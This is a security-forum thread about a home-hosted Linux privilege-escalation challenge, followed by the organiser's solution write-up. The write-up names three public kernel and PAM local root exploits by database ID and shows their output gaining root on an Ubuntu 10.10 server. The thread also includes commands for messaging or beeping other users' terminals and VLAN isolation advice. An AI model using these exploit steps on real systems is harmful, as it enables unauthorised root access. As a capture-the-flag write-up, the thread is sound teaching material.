Security Challenge IV (Experimental)

h57xiucj2z946q · 29-05-2011 11:52am #1

Ok as the title says, this is just an experimental challenge I quickly threw together last night. It may not work too well, or may not work at all, so don't be too disappointed. But this challenge steers away from the other web apps kind of challenges here to try something different, which in turn I hope is pretty fun for the challenger.

The Challenge: Use whatever means necessary to get on the Hall of Fame (You'll see the Hall of Fame when you start)

Due to the nature of this challenge, there is potential for abuse. You are free to play around with server once you don't ruin the challenge for others.

Also, to stop random people/ trollers/ non boards.ie members coming across this thread, you can email me ( damienreilly @ gmail.com ) for the server ip with your boards username or post here or send me a PM. If I recognize you, I will give out the address, You I will hopefully be able to reply to you pretty quickly. Users with 1 post.. heheh eh no!

rcdk1 · 29-05-2011 12:08pm

Would PM not be more appropriate rather than asking people to disclose their private email addresses? (given that this is the security forum

)
having said that, I'm not knocking what you've done and would be interested in having a look.

h57xiucj2z946q · 29-05-2011 12:12pm

rcdk1 wrote: »

Would PM not be more appropriate rather than asking people to disclose their private email addresses? (given that this is the security forum )
having said that, I'm not knocking what you've done and would be interested in having a look.

Emails come straight through to my phone when away from the laptop, also I'm sure most people got a 2nd address when messing around.

29-05-2011 1:47pm

If your worried about your email address use something like yopmail.com

*edit
soory you cant send emails from yopmail.
Use hushmail instead

h57xiucj2z946q · 29-05-2011 3:40pm

You can me a PM either if yous prefare that or even post here.. Might be slower response though.

dlofnep · 29-05-2011 8:30pm

E-mail sent

h57xiucj2z946q · 29-05-2011 11:08pm

Bad news: I had to remove one of the parts of the challenge, it was causing problems when accessed externally outside my network.

The good news: this makes the challenge easier for you, but maybe a little less fun.

dlofnep · 29-05-2011 11:31pm

Just logged in there and had a wee peak. I'll give it a proper bash tomorrow - jaded tonight.

h57xiucj2z946q · 30-05-2011 12:09am

Thoes that created accounts earlier today will have to do that again I'm afraid. Sorry.

h57xiucj2z946q · 30-05-2011 4:04pm

Sigtran completed it first, well done to him.

Just a reminder, your own home folder are private and noone can view their content, but make sure to clean up anything you do outside your home dir that others could be able to steal ideas from or use.

Cheers to Sigtran for already doing this.

dlofnep · 30-05-2011 7:25pm

Done

h57xiucj2z946q · 30-05-2011 7:55pm

Sweet. And I may have an idea for a second challenge where that first step is only the first part :-)

dlofnep · 30-05-2011 8:14pm

Wait and see if a few people get it anyways first

h57xiucj2z946q · 31-05-2011 11:22am

I think some may have given up. Remember I said "use any means necessary" :-)

dlofnep · 31-05-2011 11:45am

I passed on the details privately to a friend. He's going to drop you an e-mail anyways out of courtesy

h57xiucj2z946q · 31-05-2011 11:51am

That's no problem :-)

h57xiucj2z946q · 31-05-2011 12:04pm

Any of you's with super powers can have fun with:

echo "message" | wall

or send personal messages to someones terminal:

echo "message" > /dev/pts/?

Use who to get their pts number.

This is also a fun one to do on a large server (non destructive):

tput bel | tee `who | awk '{printf "/dev/"$2" "}'`

makes eveyone's terminal beep.

h57xiucj2z946q · 01-06-2011 10:48am

Latest:

Challenge IV Hall of Fame:

Sigtran
peann
rockethamster
900913
Pygmalion

dlofnep · 01-06-2011 12:39pm

Nice

Thoroughly enjoyable challenge Damo. You're some man for one man

h57xiucj2z946q · 01-06-2011 4:48pm

Anyone else wanna try it, if not, I will take it down tonight and post the (very little) source code involved.

Anyone wanna ask about particular server setup or aspects of the challenge?

Redshift · 01-06-2011 5:14pm

I haven't had time to really get a look at this. Im working on finishing a course assignment. So i think ill give it a miss im not great with *nix anyway.
Thanks for putting it together.

dlofnep · 01-06-2011 5:58pm

Redshift, if you need any pointers - just send me a message

h57xiucj2z946q · 01-06-2011 11:31pm

Final Hall of Fame:

Sigtran
peann
rockethamster
900913
Pygmalion

Solution:
First page tells you, you are getting webspace for free. Register an account.

You are told that your account is created and you can upload it via sftp. You may already know that sftp is secure ftp. Almost always paired with ssh (secure shell) in the one daemon over the same port. So you might try connect to the server via sftp client e.g. WinSCP or OpenSSH's sftp command line utility, but more interestingly you might have tried to connect over SSH to check if Shell access was disabled or not. Shell access wasn't disabled.. dumb administrator!!

Ok you logged in and are greeted with:

login as: damo
damo@damo-challenge4.dyndns.biz's password:
Linux challenge4server 2.6.35-22-generic-pae #33-Ubuntu SMP Sun Sep 19 22:14:14 UTC 2010 i686 GNU/Linux
Ubuntu 10.10

Welcome to Challenge IV.
Due to the nature of this challenge, there is lots of potential for abuse.
You are free to play around with the server, once you do not prevent other users from attempting the challenge.

Challenge IV Hall of Fame:
Sigtran
peann
rockethamster
900913
Pygmalion

damo@challenge4server:~$

Snooping around the server, you see that the other challengers home directories are unreadable. But you can see that a script exists in / called UPDATE_HALL_OF_FAME.sh.

damo@challenge4server:/$ ls -l UPDATE_HALL_OF_FAME.sh
-rwx

1 root root 213 2011-05-30 17:20 UPDATE_HALL_OF_FAME.sh

Only root will have access to read and execute this, so maybe you need to become root?

You have local access to the server, maybe we can execute a local privilege escalation execution exploit?

You can pop onto exploit-db.com and search for: platform: linux type: local

Enter command on the server: uname -a

damo@challenge4server:~$ uname -a
Linux challenge4server 2.6.35-22-generic-pae #33-Ubuntu SMP Sun Sep 19 22:14:14 UTC 2010 i686 GNU/Linux
damo@challenge4server:~$

You now the ubuntu version: 10.10, archiecture: x86 and kernel: 2.6.35-22 so this should make your searching easier. If not, then just trial and error some exploits.

PAM MOTD Local Root Exploit: (note: this one is reported as tested on 9.10 and 10.04 LTS but does however work on 10.10)
http://www.exploit-db.com/exploits/14339/

damo@challenge4server:~$ ./pam_motd.sh
[%] Ubuntu PAM MOTD local root
[%] SSH key set up
[%] Backuped /home/damo/.cache
[%] spawn ssh
[+] owned: /etc/passwd
[%] spawn ssh
[+] owned: /etc/shadow
[%] Restored /home/damo/.cache
[%] SSH key removed
[+] Success! Use password toor to get root
Password:
root@challenge4server:/home/damo# id
uid=0(root) gid=0(root) groups=0(root)
root@challenge4server:/home/damo# whoami
root
root@challenge4server:/home/damo#

Linus RDS Local Privilege escalation:
http://www.exploit-db.com/exploits/15285/

damo@challenge4server:~$ ./local-rds.c
[%] Linux kernel >= 2.6.30 RDS socket exploit
[%] by Dan Rosenberg
[%] Resolving kernel addresses...
[+] Resolved security_ops to 0xc09ddc0c
[+] Resolved default_security_ops to 0xc08137a0
[+] Resolved cap_ptrace_traceme to 0xc030c580
[+] Resolved commit_creds to 0xc0174b20
[+] Resolved prepare_kernel_cred to 0xc0174f70
[%] Overwriting security ops...
[%] Overwriting function pointer...
[%] Triggering payload...
[%] Restoring function pointer...
[%] Got root!
# id
uid=0(root) gid=0(root) groups=0(root)
# whoami
root
#

Linux Kernel <= 2.6.37 Local Privilege Escalation (full-nelson):
http://www.exploit-db.com/exploits/15704/

damo@challenge4server:~$ ./full-nelson
[%] Resolving kernel addresses...
[+] Resolved econet_ioctl to 0xe0a882a0
[+] Resolved econet_ops to 0xe0a883a0
[+] Resolved commit_creds to 0xc0174b20
[+] Resolved prepare_kernel_cred to 0xc0174f70
[%] Calculating target...
[%] Failed to set Econet address.
[%] Triggering payload...
[%] Got root!
# id
uid=0(root) gid=0(root) groups=0(root)
# whoami
root
#

Lets add our name to the hall of fame:

# bash
root@challenge4server:/# cd /
root@challenge4server:/# ./UPDATE_HALL_OF_FAME.sh
Usage: ./UPDATE_HALL_OF_FAME.sh <name>
Adds a user name to the Challenge IV Hall of Fame.
root@challenge4server:/# ./UPDATE_HALL_OF_FAME.sh damo
damo added to the Hall of Fame. Congratulations.
root@challenge4server:/#

Lets check, re-log in to check the dynamic MOTD:

login as: damo
damo@damo-challenge4.dyndns.biz's password:
Linux challenge4server 2.6.35-22-generic-pae #33-Ubuntu SMP Sun Sep 19 22:14:14 UTC 2010 i686 GNU/Linux
Ubuntu 10.10

Welcome to Challenge IV.
Due to the nature of this challenge, there is lots of potential for abuse.
You are free to play around with the server, once you do not prevent other users from attempting the challenge.

Challenge IV Hall of Fame:
Sigtran
peann
rockethamster
900913
Pygmalion
damo

damo@challenge4server:~$

Thats it.

If anyone is interested, the main web script for this challenge was a CGI script written in perl that had the setuid bit set for root. 99.99% of times there is no excuse to use CGI+setuid as root. It can be a major security risk and design flaw. Perl tries to minimise the threat by forcing you sanitise all data you use that was attained externally from the script itself.

I have attached the script if anyone wants to create a similar challenge.

Some files had been set as immutable or append only, to prevent "root" users accidentally deleting files or erasing data from files.

Any other questions?

02-06-2011 12:05am

I had a look at this on sunday night I think, after a four day drinking binge.

I thought I'd have to use metasploit which I have never used live.

Sobered up tuesday and had a look and did a

uname -a

and then as a long shot googled "local root exploit 2.6.35"

I'd love to know what the other part was as I normally don't try root servers any more, I'm happy getting mysql root.

Thanks again Damo for another real life like challenge..

Great....

h57xiucj2z946q · 02-06-2011 12:20am

Also:

Giving people access to a linux server on your network with root access can potentially be dangerous. Even in a VM, they will either share a lan with your router/gateway, or its own network with the host OS since you gave the guest OS outgoing and incoming access to/from the internet.

What if someone on the vm installs wireshark, ettercap, sslsniff, sslstrip. They can then potentially sniff all the traffic on your network, or sniff the traffic on the host OS. What if they mess with the settings on your router?

A solution is to set-up a VLAN on your router/gateway and separate the traffic between your normal home network for all your devices with one VLAN and a separate VLAN for the challenge.

If you are running the challenge in a virtual machine on a machine that you actively use, to separate the traffic, you will need 2 interfaces to your router.

I will talk here how to do it with two wifi adapters, but it probably could be done with 2 ethernet or 1 wifi & 1 ethernet, but I haven't tried that. My laptop is upstairs and router is downstairs, so I went with 2 wifi. Built in card, and a USB adapter. You will need a USB wifi adapter to allow a guest OS full access to it through a host. PCMCIA wont work.

I have a Netopia 2247NG-EIR(com) so to perform this with this router, I did:

- Enable 2nd SSID, WPA2 key, Closed System Mode (SSID is not broadcasted).
- Enable Expert Mode. Go to Configure, Advanced, VLAN

     Enable first VLAN. 
         Name: vcc
         Type: By Port
         Admin Restricted: no
         Portname: vcc1
         Ip Interface: ip-vcc1
         Inter VLAN Group: Group A & B
     Enable second VLAN. 
         Name: normal
         Type: By Port
         Admin Restricted: no
         Portname: all interfaces for normal use e.g. eth0.1, eth0.2, ssid1
         Ip Interface: ip-eth-a
         Inter VLAN Group: Group A
     Enable third VLAN. 
         Name: restricted
         Type: By Port
         Admin Restricted: yes (blocks accessing router settings)
         Portname: interface for the challenge server (for me ssid2)
         Ip Interface: ip-eth-a
         Inter VLAN Group: Group B

- Configure VMware or VBOX guest OS to have no virtual network adapter. Remove it completey. Host-only is not good enough in my opinion. Make sure your virtual machine is configured to use your USB wifi adapter. In VMWARE you click the usb icon at the bottom of the player to tell it to disconnect the usb device from host OS and connect it to the guest OS.

- Inside the guest OS, manually connect the WIFI adapter to the new SSID you created for the challenge.

I guess if your using ethernet, you need a virtual network adapter and bridge it to your actual ethernet adapter. You can do this with both VBOX and VMWARE.

NAT/Port forwarding is still possible. Its works same as before when you didn't have VLAN setup. Just forward the port to the IP of the Guest OS.

h57xiucj2z946q · 02-06-2011 12:21am

900913 wrote: »

I'd love to know what the other part was as I normally don't try root servers any more, I'm happy getting mysql root.

You may see in a future challenge!

dlofnep · 02-06-2011 10:02am

First thing I did was scour over the cgi script for input validation, as I saw it was SUIDto root. Couldn't see anyway inherent flaws, so I checked for misconfigurations on the system. Tbh, I didn't expect it to be a local exploit on account of the usual nature of the challenges. Only when I couldn't find any config errors did I run the full-nelson exploit. Bob's your uncle.

dlofnep · 02-06-2011 10:05am

Also, when I originally logged in - I had read access to other user's directories including read access to their .bash_history. Could have given the competition away for many people had anyone had rooted it at that point.

h57xiucj2z946q · 02-06-2011 10:08am

dlofnep wrote: »

Also, when I originally logged in - I had read access to other user's directories including read access to their .bash_history. Could have given the competition away for many people had anyone had rooted it at that point.

Aye, to be honest I was still patching/coding the challenge as I went along. hence the "experimental" hehe. I later chmod'ed the dirs 701. i did remove a rather significant part of the challenge also about 8 hours into it as it was causing problems. Didn't cause problems for me locally, so I didn't see it.

dlofnep · 02-06-2011 10:39am

Aye, no worries. Cheers again for the challenge. Great fun as always.

02-06-2011 2:16pm

On the main login/create account page I tried use the name root as my account.

I think it created a user root in the home directory "/home/root", but it wouldn't let me login to ssh.

Also Rockethamster used the same username/password combo.
Rockethamster:Rockethamster and left a root exploit in his /home directory.

Security Challenge IV (Experimental)

Comments